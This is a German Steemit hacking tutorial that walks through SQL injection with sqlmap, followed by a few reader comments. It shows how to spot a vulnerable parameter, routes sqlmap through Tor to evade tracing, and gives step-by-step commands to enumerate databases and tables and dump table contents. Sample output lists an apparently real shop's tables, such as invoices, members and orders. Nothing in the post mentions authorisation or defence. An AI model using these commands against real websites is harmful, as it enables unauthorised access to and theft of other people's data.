SQL Injection mit SQLmap Tutorial [Deutsch]

in #hack7 years ago

Moin moin,

Ich will euch den einfachen Umgang mit SQLMap beibringen.

Kommen wir als erstes zu den Voraussetzungen!

Voraussetzungen:

Python 2.6 oder 2.7

Anfang:

So fangen wir an!

Wir haben eine URL z.B. http://www.site.com wir suchen uns jetzt ein Artikel aus bei mir ist es: http://www.site.com...product_id=2279

jetzt sehen wir mehrer ID's wenn wir jetzt am Ende einfach ein " ' " anhängen und einen Fehler bekommen wissen wir das diese URL angreifbar ist!

Start SQLMap:

Fangen wir mal richtig an Posted Image

Wir starten jetzt SQLMap mit der URL wo wir denken das sie angreifbar ist!

python sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.site.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279" 

(Ich starte das ganze mit Tor für die Sicherheit! wenn ihr kein Tor benutzen wollt lasst einfach "--tor --tor-type=SOCKS5" weg! )

Wenn wir eine Nachricht bekommen das z.B. ID Injectable ist machen wir weiter.

python sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.site.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279" --dbs

Damit können wir die einzelnen Tabellen ausgeben das sieht dann so aus:

web server operating system: Linux Fedora
web application technology: Apache 2.2.9, PHP 5.2.9
back-end DBMS: MySQL 5.0
[10:36:20] [INFO] fetching database names
[10:36:21] [INFO] the SQL query used returns 3 entries
[10:36:23] [INFO] retrieved: information_schema
[10:36:24] [INFO] retrieved: TEST-Link_UK
[10:36:25] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] test
[*] TEST-Link_UK
[10:36:25] [INFO] fetched data logged to text files under '/home/hagbard-celine/Anwendungen/Injection/sqlmap-dev/output/www.site.com'

Jetzt haben wir die Tabellen mit den können wir weiter arbeiten:

python sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.site.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279" --tables -D test

Ausgabe:

Database: TEST-Link_UK
[50 tables]
+--------------------+
| PostAreaMod    |
| PostAssociate  |
| PostMod        |
| VisitRecord    |
| VisitRecordHistory |
| cable          |
| cable_order    |
| car1           |
| city           |
| cityarea       |
| class          |
| class_link         |
| contact        |
| country        |
| country_tax    |
| document       |
| epaperorder    |
| form           |
| guestbook      |
| homepage       |
| invoice        |
| invoice_detail     |
| joint          |
| mailerror      |
| manager        |
| marquee        |
| member             |
| mpost          |
| mpost_rule         |
| order_detail   |
| order_list         |
| piorder_detail     |
| piorder_list   |
| post           |
| postage_area   |
| product        |
| product_download |
| product_link |
| product_qa |
| product_suit |
| product_unit |
| product_unit_old |
| product_word |
| record_people |
| savemail |
| ver2_homepage |
| ver2_info |
| ver2_language |
| test_config |
| test_present |
+--------------------+

Ab jetzt ist nur noch warten angesagt und wie weit ihr schauen wollt!
Ich liste euch noch ein paar Befehle auf womit ihr die einzelnen Einträge auslesen könnt und die Datenbank auch Dumpen könnt.

Einzelne Einträge aus einer Tabelle auslesen:

python sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.site.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279" --columns -D TEST-Link_UK -T savemail

Und mit diesem Befehl könnte man das ganze Dumpen:

python sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.site.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279" --dump -D TEST-Link_UK -T savemail

Hier noch mal die Befehle zur Übersicht:

python sqlmap.py -u "http://www.site.com/section.php?id=51"

Die Datenbanken ausgeben:

python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

Die Tabellen:

python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D [database name]

Die einzelnen Einträge:

python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D [database name] -T [table]

Dumpen:

python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D [database name] -T [table]
Sort:  

Hallo @cpt-nemo, herzlich willkommen auf Steemit.

Wenn Du Fragen zu Steemit hast, oder Dich mit anderen deutschen „Steemians“ austauschen magst, schau einfach mal auf unserem Discord-Server https://discord.gg/g6ktN45 vorbei.

Unter dem folgenden Link findest Du einige Anleitungen, die Dir den Einstieg in das Steem-Universum deutlich erleichtern werden: Deutschsprachige Tutorials für Steemit-Neulinge: Ein Überblick

Nice article. I will be following you. Please see my blogpost on learning SQL Injection manually: https://steemit.com/infosec/@netscape101/how-to-learn-sql-injection

http://www.infosectoughguy.com/2017/06/how-to-learn-sql-injection.html

Ek sprecken nie Duits nie, maar wel Nederlands. Baie goeie artikel! Ek hoop jy is 'n member van Chaos Computer Club! Regards